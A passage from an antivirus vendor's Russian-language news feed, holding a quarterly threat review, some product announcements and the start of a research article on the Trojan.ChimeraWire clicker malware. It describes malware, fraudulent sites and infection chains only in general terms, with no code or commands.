&lt;p&gt;Уже в декабре на нашем сайте вышел &lt;a href="https://news.drweb.ru/show/?i=15090&amp;lng=ru" target="_blank"&gt;материал&lt;/a&gt; об уникальном трояне &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire&amp;lng=ru"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами. &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire&amp;lng=ru"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; попадает на компьютеры в результате работы нескольких вредоносных приложений, которые эксплуатируют уязвимости класса DLL Search Order Hijacking, а также используют антиотладочные приемы, чтобы избежать обнаружения.&lt;/p&gt;

&lt;p&gt;В течение IV квартала интернет-аналитики «Доктор Веб» зафиксировали новые мошеннические сайты, которые сулили потенциальным жертвам быстрый и легкий заработок. Также были выявлены очередные фишинговые интернет-ресурсы и поддельные сайты маркетплейсов.&lt;/p&gt;

&lt;p&gt;Наши специалисты обнаружили очередные вредоносные программы в каталоге Google Play. Среди них трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые подписывают владельцев Android-устройств на платные услуги, а также вредоносные приложения &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые злоумышленники используют в различных мошеннических схемах. В то же время статистика детектирований Dr.Web Security Space для мобильных устройств показала рост активности банковских троянов для платформы Android.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции IV квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Увеличение числа угроз, детектируемых на защищаемых устройствах&lt;/li&gt;
        &lt;li&gt;Снижение числа уникальных угроз, использованных при атаках&lt;/li&gt;
        &lt;li&gt;Рост количества запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками&lt;/li&gt;
        &lt;li&gt;Возросшая активность банковских троянов, нацеленных на владельцев Android-устройств&lt;/li&gt;
        &lt;li&gt;Распространение бэкдора &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, взламывающего учетные записи Telegram пользователей Android&lt;/li&gt;
        &lt;li&gt;Появление новых вредоносных приложений в каталоге Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным сервиса статистики «Доктор Веб»&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы IV квартала 2025 года&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; и &lt;span class="string"&gt;розробника&lt;/span&gt; и шлет им событие нажатия кнопки Escape, принудительно закрывая их.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4268&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Siggen.33379&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Поддельный браузерный блокировщик рекламы Adblock Plus, который устанавливается в систему другими вредоносными приложениями с целью показа рекламы.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Статистика вредоносных программ в почтовом трафике&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы в почтовом трафике IV квартала 2025 года&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование упакованной версии троянской программы &lt;a href="https://vms.drweb.ru/search/?q=Trojan.AutoIt.289&amp;lng=ru"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. &lt;a href="https://vms.drweb.ru/search/?q=Trojan.AutoIt.289&amp;lng=ru"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.791&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Шифровальщики&lt;/h3&gt;

&lt;p&gt;В IV квартале 2025 года число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, увеличилось на 1,15% по сравнению с III кварталом.&lt;/p&gt;

&lt;p&gt;Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные энкодеры IV квартала 2025 года&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24,90% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 4,21% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Encoder.29750&amp;lng=ru"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3,42% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Encoder.26996&amp;lng=ru"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2,68% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356 &lt;/b&gt; — 0,38% обращений пользователей&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Сетевое мошенничество&lt;/h3&gt;

&lt;p&gt;В течение IV квартала 2025 года интернет-аналитики «Доктор Веб» отметили появление новых поддельных сайтов маркетплейсов. Мошенники якобы от имени торговых площадок предлагают потенциальным жертвам сыграть в игру типа «карусель» (аналог рулетки) с шансом получить приз. После нескольких попыток пользователю «везет», но для получения выигрыша от него якобы сначала требуется оплатить доставку, затем страховку, налог и т. д. В некоторых случаях жертве сообщают, что искомый товар отсутствует, и ей предлагают обменять товар на деньги. Однако для их получения необходима оплата «пошлины». Если пользователь соглашается, от него вновь требуют дополнительных платежей в виде страховки, активации некоего счета и т. п.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример поддельного сайта маркетплейса, предлагающего «розыгрыш призов»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В базу нерекомендуемых и вредоносных сайтов также были добавлены очередные интернет-ресурсы, на которых мошенники продают несуществующие театральные билеты. На таких сайтах предлагается посетить популярные постановки, в том числе по привлекательным ценам. Однако после оплаты жертвы не получают желаемые билеты и фактически отдают мошенникам деньги.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из мошеннических сайтов по продаже несуществующих театральных билетов&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Также были обнаружены очередные ресурсы, которые имитируют сайты частных кинотеатров и предлагают приобрести билеты для просмотра фильмов. Никаких билетов после покупки на таких площадках жертвы в итоге не получают.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт частного кинотеатра&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Наши специалисты выявили ряд фишинговых ресурсов, среди которых были поддельные сайты сервиса Steam. С их помощью злоумышленники пытались получить данные учетных записей пользователей, предлагая тем указать логин и пароль для аутентификации.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Фишинговый сайт, который имитирует настоящий интернет-портал Steam и предлагает потенциальной жертве войти в свою учетную запись&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Кроме того, мошенники вновь заманивали потенциальных жертв в несуществующие инвестиционные проекты. Один из выявленных сайтов предлагал русскоязычным пользователям в Америке вложить 250$ в проект под названием Federal Invest и «зарабатывать до 90 000 долларов за три месяца». Данный проект якобы был создан в том числе при участии Дональда Трампа.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт, предлагающий принять участие в «выгодном инвестиционном проекте»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Другой сайт сообщал о том, что узбекские пользователи имеют возможность получать от 15 00 000 узбекских сум уже в первый месяц после присоединения к рекламируемому проекту, якобы имеющему отношение к крупному холдингу.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт, обещающий жителям Узбекистана крупную прибыль от участия в «инвестиционном проекте»&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/"&gt;Узнайте больше о нерекомендуемых Dr.Web сайтах&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Вредоносное и нежелательное ПО для мобильных устройств&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами, несмотря на снижение активности, вновь оказались рекламные трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. На третье место поднялись вредоносные приложения семейства &lt;b&gt;Android.Siggen&lt;/b&gt;, которые обладают различной функциональностью. В течение минувших 3 месяцев возросла активность банковских троянов, при этом наибольший рост среди них показали представители семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Наиболее распространенным нежелательным ПО стали программы &lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;, модифицированные через облачный сервис CloudInject. Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений &lt;b&gt;Tool.NPMod&lt;/b&gt;, модифицированных при помощи инструмента NP Manager. Самыми распространенными рекламными программами оказались модули &lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;, которые разработчики встраивают в Android-программы.&lt;/p&gt;

&lt;p&gt;В октябре компания «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15076&amp;lng=ru" target="_blank"&gt;опубликовала&lt;/a&gt; сведения об опасном бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, внедренном злоумышленниками в модификации мессенджера Telegram X. Вредоносная программа похищает конфиденциальную информацию и позволяет управлять учетной записью жертвы, а также непосредственно контролировать мессенджер, меняя логику его работы.&lt;/p&gt;

&lt;p&gt;В течение IV квартала наши вирусные аналитики обнаружили в каталоге Google Play очередные угрозы, среди которых были трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые подписывают пользователей на платные услуги, а также используемые в мошеннических целях вредоносные приложения &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Наиболее заметные события, связанные с «мобильной» безопасностью в IV квартале&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Рекламные трояны остались самыми распространенными угрозами для Android-устройств&lt;/li&gt;
    &lt;li&gt;Возросла активность банковских троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;В сторонних модификациях мессенджера Telegram X был обнаружен опасный бэкдор &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;В каталоге Google Play появились новые вредоносные приложения&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Более подробно о вирусной обстановке для мобильных устройств в IV квартале 2025 года читайте в нашем &lt;a href="https://news.drweb.ru/show/?i=15101" target="_blank"&gt;обзоре&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15107&amp;lng=ru</guid><title>Новогодний интерактивный квест от «Доктор Веб» уже стартовал!</title><link>https://news.drweb.ru/show/?i=15107&amp;lng=ru&amp;c=5</link><pubDate>Thu, 25 Dec 2025 13:19:03 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Мы с радостью объявляем о запуске традиционного Новогоднего Адвента от «Доктор Веб».&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Последняя неделя декабря всегда наполнена суетой и хлопотами. Все успеть поможет интерактивное приключение в городе «Доктор Веб».&lt;/p&gt;&lt;p&gt;Исследуйте карту, посещайте локации и находите полезные призы: от бесплатных лицензий до эксклюзивных скидок. Принять участие в новогоднем квесте может любой желающий. Ознакомьтесь с условиями акции на странице-карте нашего города и отправляйтесь в путешествие по его улицам.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Успехов в поисках!&amp;nbsp;&lt;br&gt;&lt;a class="btn" href="https://www.drweb.ru/landing/advent2026"&gt;Отправиться в путешествие&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15103&amp;lng=ru</guid><title>Обновлены сертифицированные дистрибутивы продуктов линейки Dr.Web Enterprise Security Suite в рамках сертификата ФСТЭК России № 3509</title><link>https://news.drweb.ru/show/?i=15103&amp;lng=ru&amp;c=5</link><pubDate>Mon, 22 Dec 2025 14:43:36 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» сообщает о выпуске обновлений для сертифицированных дистрибутивов программных продуктов комплекса Dr.Web Enterprise Security Suite. Нами была пройдена процедура инспекционного контроля по сертификату соответствия ФСТЭК России № 3509, сам сертификат соответствия остается действующим на ранее установленных условиях. Обновленные дистрибутивы и эксплуатационная документация, включая формуляр, уже доступны для загрузки в Мастере скачиваний.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Инспекционный контроль подтвердил соответствие линейки сертифицированных продуктов Dr.Web Enterprise Security Suite требованиям нормативных правовых актов Российской Федерации в области защиты информации. &amp;nbsp;&lt;/p&gt;&lt;p&gt;Напоминаем, что&lt;a href="https://company.drweb.ru/licenses_and_certificates/fstek/"&gt; сертифицированные ФСТЭК России продукты Dr.Web &lt;/a&gt;предназначены для использования в организациях с повышенными требованиями к уровню информационной безопасности и соответствуют требованиям регуляторов в части применения средств антивирусной защиты.&lt;/p&gt;&lt;p&gt;Поставки лицензий на сертифицированные продукты Dr.Web сопровождаются полным комплектом сертификационных материалов.&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15095&amp;lng=ru</guid><title>Обновлено лицензионное соглашение к продукту Dr.Web FixIt!</title><link>https://news.drweb.ru/show/?i=15095&amp;lng=ru&amp;c=5</link><pubDate>Mon, 15 Dec 2025 15:18:12 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Мы обновили лицензионное соглашение к продукту Dr.Web FixIt!. С документом можно ознакомиться по ссылке &lt;a href="https://license.drweb.ru/agreement/"&gt;https://license.drweb.ru/agreement/&lt;/a&gt;.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! необходим для детального анализа безопасности рабочих станций и серверов под управлением ОС Windows, и устранения выявленных вирусных угроз и потенциальных уязвимостей. Его ключевое преимущество в том, что он может выявлять новейшее вредоносное ПО и программы, используемые для целевых атак, которые не определяются другими инструментами кибербезопасности.&lt;/p&gt;&lt;p&gt;В первую очередь Dr.Web FixIt! предназначен для специалистов, которые проводят мониторинг безопасности компьютерной инфраструктуры и анализируют киберинциденты. Тем не менее, даже при отсутствии в компании специализированной SOC-команды, решение способно как диагностировать угрозу на рабочей станции и/или сервере, так и произвести лечение после обнаружения.&amp;nbsp;&lt;/p&gt;&lt;p&gt;В случае необходимости специалисты «Доктор Веб» помогут проанализировать информацию, полученную с помощью Dr.Web FixIt!. Для этого необходимо приобрести сертификат на экспертное сопровождение задачи.&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! находится в &lt;a href="https://reestr.digital.gov.ru/reestr/1086554/"&gt;едином реестре российских программ для ЭВМ и БД&lt;/a&gt;. Приобрести решение можно у &lt;a href="https://partners.drweb.ru/find_partner/"&gt;партнеров&lt;/a&gt; «Доктор Веб».&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15094&amp;lng=ru</guid><title>Крупное обновление сервера централизованного управления для Dr.Web Enterprise Security Suite и Dr.Web Industrial</title><link>https://news.drweb.ru/show/?i=15094&amp;lng=ru&amp;c=5</link><pubDate>Fri, 12 Dec 2025 11:13:26 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» выпускает масштабное обновление для сервера в составе Dr.Web Enterprise Security Suite и Dr.Web Industrial 13.0.1.202511120. Оно будет доступно для загрузки с 15 декабря 2025 года. Ключевое изменение — расширение возможностей компонента «Контроль приложений», что поможет существенно усилить защиту пользователей.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;В пакет обновлений мы добавили новые возможности и улучшения. В частности, для пользователей линейки продуктов Dr.Web Enterprise Security Suite и Dr.Web Industrial был расширен список критериев функционального анализа:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;В категории «Запуск приложений» появились запреты на запуск дочерних процессов офисными программами и почтовыми клиентами. Это снижает риск заражения через вредоносные документы и письма, не мешая обычной работе пользователей.&lt;/li&gt;&lt;li&gt;В категории «Запуск скриптовых интерпретаторов» добавлены новые правила, позволяющие блокировать запуск сценариев из офисных приложений и почтовых клиентов, а также ограничивать выполнение скриптов AutoIt, а также Java и Python. Такие ограничения защищают от злоупотребления интерпретаторами, которые часто используются при кибератаках, а также при выполнении нежелательных автоматизаций.&lt;/li&gt;&lt;li&gt;В категорию «Загрузка драйверов» включен запрет на установку драйверов без WHQL подписи, что помогает предотвратить использование неподписанных модулей и загрузку потенциально опасного кода в ядро системы.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Обновленный набор правил дает администраторам средств защиты более гибкие инструменты для предотвращения вредоносной активности и повышения устойчивости инфраструктуры к современным угрозам.&lt;br&gt;Также мы избавились от ряда выявленных ранее проблем. Среди них:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;исправлена ошибка, которая могла возникнуть при обновлении ПО Сервера Dr.Web под ОС Windows в условиях ограниченных вычислительных ресурсов;&lt;/li&gt;&lt;li&gt;исправлена ошибка, из-за которой при выборе настройки «Обновлять только базы» в разделе Центра управления «Ограничения обновлений» не обновлялся продукт репозитория «Базы контент-фильтров для UNIX»;&lt;/li&gt;&lt;li&gt;исправлена логика обновления кеша ответов DNS-сервера.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Подробный перечень исправлений вы сможете прочитать в этом &lt;a href="https://f2.drweb.com/get+meta+file/?k=55b93831647508c05be897981b98b0b4&amp;amp;sdl=ru&amp;amp;sdf=t"&gt;документе&lt;/a&gt;.&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15090&amp;lng=ru</guid><title>Беллерофонту такое и не снилось. Троян ChimeraWire накручивает популярность сайтов, искусно притворяясь человеком</title><link>https://news.drweb.ru/show/?i=15090&amp;lng=ru&amp;c=5</link><pubDate>Mon, 08 Dec 2025 07:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/ChimeraWire_ru_pdf.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;8 декабря 2025 года&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Введение&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;В ходе анализа одной из партнерских программ специалисты компании «Доктор Веб» обнаружили уникальное ВПО с функциональностью кликера, получившее наименование &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;. Оно работает на компьютерах под управлением ОС Windows и основано на проектах с открытым исходным кодом &lt;a href="https://github.com/sohaha/zlsgo" target="_blank"&gt;zlsgo&lt;/a&gt; и &lt;a href="https://go-rod.github.io/" target="_blank"&gt;Rod&lt;/a&gt; для автоматизированного управления веб-сайтами и веб-приложениями.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; позволяет злоумышленникам имитировать действия пользователей и накручивать поведенческий фактор веб-сайтов, искусственно поднимая их рейтинг в выдаче поисковых систем. Для этого вредоносная программа выполняет поиск нужных интернет-ресурсов в системах Google и Bing, после чего открывает их. Она также имитирует действия пользователей, самостоятельно нажимая на ссылки на загруженных сайтах. Троян совершает все вредоносные действия через браузер Google Chrome, который он скачивает с определенного ресурса и запускает в скрытом режиме отладки по протоколу WebSocket.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; попадает на компьютеры в результате работы нескольких вредоносных программ-загрузчиков. Они используют различные техники повышения привилегий на основе эксплуатации уязвимостей класса DLL Search Order Hijacking, а также антиотладочные приемы с целью избежать обнаружения. Наша антивирусная лаборатория отследила как минимум 2 цепочки заражения с их участием. В одной из них центральное место занимает вредоносный скрипт &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;, а в другой — вредоносная программа &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, которая по принципу работы схожа с &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; и фактически выступает его альтернативой.&lt;/p&gt;

&lt;p&gt;В данном исследовании мы рассмотрим особенности &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; и вредоносных программ, которые доставляют его на устройства пользователей.&lt;/p&gt;

&lt;h3&gt;Первая цепочка заражения&lt;/h3&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_ru.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема, иллюстрирующая первую цепочку заражения&lt;/em&gt;&lt;/p&gt;

